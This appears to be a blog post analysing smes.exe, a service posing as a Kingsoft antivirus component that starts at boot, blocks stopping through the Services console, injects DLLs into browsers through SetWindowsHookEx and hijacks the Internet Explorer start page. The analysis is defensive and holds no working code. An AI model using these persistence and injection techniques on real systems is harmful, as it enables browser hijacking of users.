<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">A service named</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Kingsoft Antivirus Webshield Service</span> <span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">is created that starts smes.exe everytime the system boots up.</span></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service Name: Kingsoft Antivirus WebShield Service</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Display Name: Kingsoft Antivirus WebShield Service</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service Type: SERVICE_INTERACTIVE_PROCESS, SERVICE_WIN32_OWN_PROCESS</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service State: SERVICE_RUNNING</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Binary Path: C:\_target\smes\$APPDATA\smes\smes.exe</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMIaWFztiGHexSfwHmq4FCBfjlc-zVrcQRoSSU_PLu1-CXxeRXnb14BTJg9np-M-JnGvEljQvA-Jl5V4GyA6N9mYtCvAkHHRhGbubxJB0crAXVYgkGloOWWdtWvlCjflVhgYUif0b1/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMIaWFztiGHexSfwHmq4FCBfjlc-zVrcQRoSSU_PLu1-CXxeRXnb14BTJg9np-M-JnGvEljQvA-Jl5V4GyA6N9mYtCvAkHHRhGbubxJB0crAXVYgkGloOWWdtWvlCjflVhgYUif0b1/s1600/11.png" height="48" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
</div>
<div style="line-height: 1.15;">
</div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once the service is started, you cannot stop it in Windows’ Services Management Console because smes.exe grays out the STOP button as seen in the figure below.</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUktHl7lLSjlpLWC9K6PGoBurJcbVuTOxdRmlobUhps5GgZ0mC5gQy4Zn6PfuBMuEYG_M58qZxW891P5VcbND9LXJ5tzIWrySFiw0gjsqbGrqb0CFRecZSoiQgGjpub0-Xa_3hufq/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUktHl7lLSjlpLWC9K6PGoBurJcbVuTOxdRmlobUhps5GgZ0mC5gQy4Zn6PfuBMuEYG_M58qZxW891P5VcbND9LXJ5tzIWrySFiw0gjsqbGrqb0CFRecZSoiQgGjpub0-Xa_3hufq/s1600/22.png" height="208" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div style="line-height: 1.15;">
</div>
<div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">However, you can manually terminate the running process id of smes.exe using Windows Task Manager or Sysinternal Process Explorer which in turn also stops the service.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Also on a note; once smes.exe starts to execute, the start page of internet explorer visibly changes to http://www.hao144.info/1/. And when terminated, the start page reverts back to the original.</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28sg8JFyo4tf8cbJIHPOJgOyn-1maVayFuBa-ciOKVPrSh1P8OxON6oHNCwApLG1GhD3ArCzP8wV7BQISM7GocphZ2MrIzZQQp8_dWpUx__TfffxZAhYuE0F9WPn7kAG64xIcTv7o/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28sg8JFyo4tf8cbJIHPOJgOyn-1maVayFuBa-ciOKVPrSh1P8OxON6oHNCwApLG1GhD3ArCzP8wV7BQISM7GocphZ2MrIzZQQp8_dWpUx__TfffxZAhYuE0F9WPn7kAG64xIcTv7o/s1600/33.png" height="178" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div style="line-height: 1.15;">
</div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div style="line-height: 1.15;">
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In our analysis, smes.exe proves to be non-malicious by itself; however, malware authors can exploit its features (like changing the start page of web browsers) to their advantage.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In order to fully know how the process of modifying the start page of web browsers was done, we proceed in analyzing smes.exe’s component dlls.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kwssp.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllCanUnloadNow</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- responsible for reading settings found in kws.ini file and passes the parameters read to kswebshield.dll module.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- attempts to establish connection to labs.duba.net which is the website of kingsoft</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kwsui.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DoDisplayLog</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">GetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">GetHookStatus</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">SetWindowStyle</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Startup</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Stop</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- injected to all running processes by using SetWindowsHookEx in order to monitor WH_CBT (http://msdn.microsoft.com/en-us/library/windows/desktop/ms644977(v=vs.85).aspx</span><span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">)</span> <span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">and</span> <span style="color: #2a2a2a; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">WH_GETMESSAGE (message queue). A good read about windows hooks plus two more other process injection techniques is found in this article http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiitLCwpWLThjftoP79uZ7wSdwc1OwSeVWex4Pp67phYLmXuc92x92GzmeJQqIkT-koKXXaNbILoT4an23OC26jIAmriMtMw6efFXI6ErmjDPTWmBMahhBgI610TmopI3HYHTDAn-Eq/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiitLCwpWLThjftoP79uZ7wSdwc1OwSeVWex4Pp67phYLmXuc92x92GzmeJQqIkT-koKXXaNbILoT4an23OC26jIAmriMtMw6efFXI6ErmjDPTWmBMahhBgI610TmopI3HYHTDAn-Eq/s1600/44.png" height="78" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- responsible for injecting kswebshield.dll to running processes</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- verifies if it is injected to the following list of process</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KSWebShield.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kxeserv.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kxfwsserv.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">winlogon.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">explorer.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kugoo.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">iexplore.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">360se.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">maxthon.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">theworld.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ttraveler.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">greenbrowser.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">MyiQ.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">myie.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tmshell.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">flashget.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SogouExplorer.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">setask.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">firefox.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">chrome.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">gsfbwsr.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">opera.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tango.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SaaYaa.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Safari.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">MxCore.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">AcroRd32.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tango3.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tangoweb.exe</span></div>
</li>
</ul>
<div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kswbc.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllCanUnloadNow</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllRegisterServer</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllUnregisterServer</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- injected to iexplore.exe only by kswebshield.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kswebshield.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">MatchingUWUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">MatchingUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">ProcessUWUrl</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">RegisterUrlProcessor</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">UnregisterUrlProcessor</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">UrlProcess</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- injected to running processes using SetWindowsHookEx API</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- the culprit responsible for replacing the start page of internet explorer to whatever website is set under “sp” tag under its ini file (kws.ini).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggoM5GXfKSSeIrvimYPB7JX4zM0x78wxXUji3uUasl_98hBa8WSaOwA7aANpcYiqtFnWa9ynOSeUvHg_7Eu-76O8xi3N_PPzS8jdKb3csijc6XpUJIniAaIq0dQP2slIRLstMn87F7/s1600/55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggoM5GXfKSSeIrvimYPB7JX4zM0x78wxXUji3uUasl_98hBa8WSaOwA7aANpcYiqtFnWa9ynOSeUvHg_7Eu-76O8xi3N_PPzS8jdKb3csijc6XpUJIniAaIq0dQP2slIRLstMn87F7/s1600/55.png" height="78" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
